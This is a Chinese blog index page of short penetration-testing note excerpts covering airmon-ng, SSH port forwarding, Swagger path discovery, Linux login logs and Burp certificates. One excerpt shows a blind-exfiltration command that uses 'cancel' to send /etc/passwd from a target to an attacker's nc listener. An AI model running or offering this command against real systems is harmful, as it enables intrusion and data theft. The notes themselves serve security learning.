摘要: 1:激活网卡监听[monitor]模式 airmon-ng <start|stop> <interface> [channel] or airmon-ng <check|check kill> 需要注意的问题: 1:执行 check kill 删除网卡干扰因素之后,想正常使用的网卡的话。会出现找不到 阅读全文
posted @ 2020-11-12 13:34 BuXuan 阅读(571) 评论(0) 推荐(0) 编辑
摘要: 来来回回 反反复复 关于kali的资料看了不少,了解的也不少 所谓的了解只是停留在的了解的基础上, 终于狠下心来,直接在小米的笔记本上安装了 kali。 在强迫自己一把。 人对事物的认知不一样,那么及时看同样的内容,对他的理解也是不一样的 不知道能坚持多久, 但是,在让自己努力一把! 阅读全文
posted @ 2020-11-04 13:49 BuXuan 阅读(426) 评论(0) 推荐(0) 编辑
该文被密码保护。 阅读全文
posted @ 2020-10-28 13:27 BuXuan 阅读(0) 评论(0) 推荐(0) 编辑
摘要: SSH 端口转发: SSH开启端口转发需要修改 /etc/ssh/sshd_config配置文件,将 GatewayPorts修改为yes -f 后台执行ssh指令 -C 允许压缩数据 -N 不执行远程指令 -R 将远程主机(服务器)的某个端口转发到本地端指定机器的指定端口 -L 本地端口转发 -D 阅读全文
posted @ 2020-10-21 14:35 BuXuan 阅读(2455) 评论(0) 推荐(1) 编辑
摘要: 靶机无回显的情况下,可使用 cancel 来把回显发送到攻击机端 cancel -u "$(cat /etc/passwd)" -h ip:port 攻击机用nc来接收返回信息 nc -lvvp [port] 实例演示: 攻击机ip:192.168.0.101 linux靶机端执行 : cancel 阅读全文
posted @ 2020-10-21 11:48 BuXuan 阅读(205) 评论(0) 推荐(0) 编辑
摘要: 之前渗透遇到过好几次,当时没怎么注意该如何使用,正好看到了一篇不错的文章。学习记录汇总如下: 如何查找 如何使用 遇到问题小技巧 1:如何查找 把以下目录直接增加到字典中, /swagger/ /api/swagger/ /swagger/ui/ /api/swagger/ui/ /swagger- 阅读全文
posted @ 2020-10-16 14:07 BuXuan 阅读(1959) 评论(0) 推荐(0) 编辑
摘要: 正常登陆 Linux 以下几个位置记录相关日志: SSH登录操作相关的日志有以下几个位置: /var/log/btmp,记录错误的登录尝试,查询命令:lastb /var/log/auth.log,记录认证成功的用户 /var/log/secure,记录与安全相关的日志信息 /var/log/las 阅读全文
posted @ 2020-09-14 17:08 BuXuan 阅读(1388) 评论(0) 推荐(0) 编辑
摘要: 原文地址: https://www.freebuf.com/articles/web/218397.html 服务器要验证客户端的证书的时候,需要现在客户端里面寻找到证书,在 burp里面 吧证书导入进去之后再抓包 阅读全文
posted @ 2020-07-16 15:38 BuXuan 阅读(1072) 评论(0) 推荐(0) 编辑
该文被密码保护。 阅读全文
posted @ 2020-07-15 10:40 BuXuan 阅读(0) 评论(0) 推荐(0) 编辑
摘要: https://github.com/qwerty472123/wxappUnpacker 阅读全文
posted @ 2020-07-09 11:16 BuXuan 阅读(4352) 评论(0) 推荐(0) 编辑